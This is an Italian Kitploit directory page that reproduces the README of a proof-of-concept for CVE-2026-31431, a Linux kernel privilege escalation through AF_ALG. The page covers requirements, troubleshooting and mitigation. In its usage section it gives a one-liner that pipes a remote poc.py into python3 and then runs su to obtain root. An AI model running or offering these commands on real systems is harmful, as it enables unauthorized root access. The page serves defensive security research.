Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-31431 — # Dimostrazione educativa proof-of-concept che illustra l'escalation locale dei privilegi nel kernel Linux tramite AF_ALG algif_aead (CVE-2026-31431). Include istruzioni d'uso e indicazioni di mitigazione per la ricerca difensiva. | Kitploit
Strumenti/GitHubGitHub/ademzero/cve-2026-31431
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitApprendimento e Formazione
GitHubademzero/cve-2026-31431

CVE-2026-31431

# Dimostrazione educativa proof-of-concept che illustra l'escalation locale dei privilegi nel kernel Linux tramite AF_ALG algif_aead (CVE-2026-31431). Include istruzioni d'uso e indicazioni di mitigazione per la ricerca difensiva.

Vedi Repository
3 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-31431 - PoC Copy Fail

Proof of Concept educativo per CVE-2026-31431, nota anche come Copy Fail, una vulnerabilità di escalation dei privilegi locale nel kernel Linux che coinvolge l'interfaccia crittografica AF_ALG / algif_aead.

[!WARNING] Questo repository è fornito esclusivamente a scopo educativo, difensivo e di ricerca sulla sicurezza autorizzata.

Non eseguire questo codice su sistemi che non possiedi o su sistemi per cui non hai esplicita autorizzazione scritta a testare.

L'uso non autorizzato potrebbe essere illegale.


Panoramica

CVE-2026-31431 è una vulnerabilità di escalation dei privilegi locale nel kernel Linux che interessa il sottosistema crittografico del kernel.

La vulnerabilità coinvolge il percorso AEAD esposto tramite l'interfaccia AF_ALG e potrebbe consentire a un utente locale non privilegiato di interferire con i dati della cache delle pagine associati a file leggibili, portando potenzialmente a un'escalation dei privilegi sui sistemi vulnerabili.

Questo repository contiene un Proof of Concept educativo minimale pensato per ambienti di laboratorio controllati.


Requisiti

Il sistema di destinazione deve esporre l'algoritmo AEAD AF_ALG richiesto.

Puoi verificarlo con:

root@kitploit:~
grep -i "authencesn\|authenc" /proc/crypto

Il PoC prevede il supporto per un algoritmo simile a:

root@kitploit:~
authencesn(hmac(sha256),cbc(aes))

Se l'algoritmo non è disponibile, il PoC potrebbe fallire con un errore come:

root@kitploit:~
FileNotFoundError: [Errno 2] No such file or directory

Ciò significa che l'algoritmo crittografico del kernel richiesto non è disponibile sul sistema.


Utilizzo

Clona il repository:

root@kitploit:~
git clone https://github.com/Karim33z/CVE-2026-31431.git
cd CVE-2026-31431

Esegui il PoC:

root@kitploit:~
python3 poc.py

Oppure eseguilo direttamente:

root@kitploit:~
curl -s https://raw.githubusercontent.com/Karim33z/CVE-2026-31431/refs/heads/main/poc.py | python3 && su

Note di compatibilità

Alcuni sistemi Linux utilizzano /bin/su invece di /usr/bin/su. Puoi verificare il percorso corretto con:

root@kitploit:~
which su

Se necessario, modifica il percorso di destinazione all'interno di poc.py.


Risoluzione dei problemi

Algoritmo AEAD mancante

Se ottieni FileNotFoundError: [Errno 2] No such file or directory durante il binding a authencesn(hmac(sha256),cbc(aes)), significa che l'algoritmo del kernel richiesto non è disponibile.

Controlla gli algoritmi crittografici disponibili:

root@kitploit:~
cat /proc/crypto

o più specificamente:

root@kitploit:~
grep -i "authencesn\|authenc\|cbc(aes)\|sha256" /proc/crypto

Percorso su errato

Se il PoC fa riferimento a /usr/bin/su ma il tuo sistema utilizza /bin/su, verifica con:

root@kitploit:~
which su

Quindi aggiorna il percorso in poc.py di conseguenza.


Mitigazione

I difensori dovrebbero aggiornare a una versione del kernel Linux corretta fornita dal proprio distributore.

Dopo l'aggiornamento del kernel, riavvia il sistema per garantire che il kernel corretto sia attivo.

Le mitigazioni temporanee possono includere la restrizione dell'accesso alle funzionalità crittografiche del kernel interessate, a seconda dell'ambiente e della distribuzione.


Disclaimer legale

Questo progetto è destinato esclusivamente a:

  • Ricerca sulla sicurezza
  • Validazione difensiva
  • Scopi educativi
  • Test di laboratorio autorizzati

L'autore non è responsabile per usi impropri, danni o attività illegali causate da questo codice.

Utilizza solo su sistemi per cui hai esplicita autorizzazione.


Licenza

Questo progetto è concesso in licenza sotto la MIT License.

Scarica lo strumento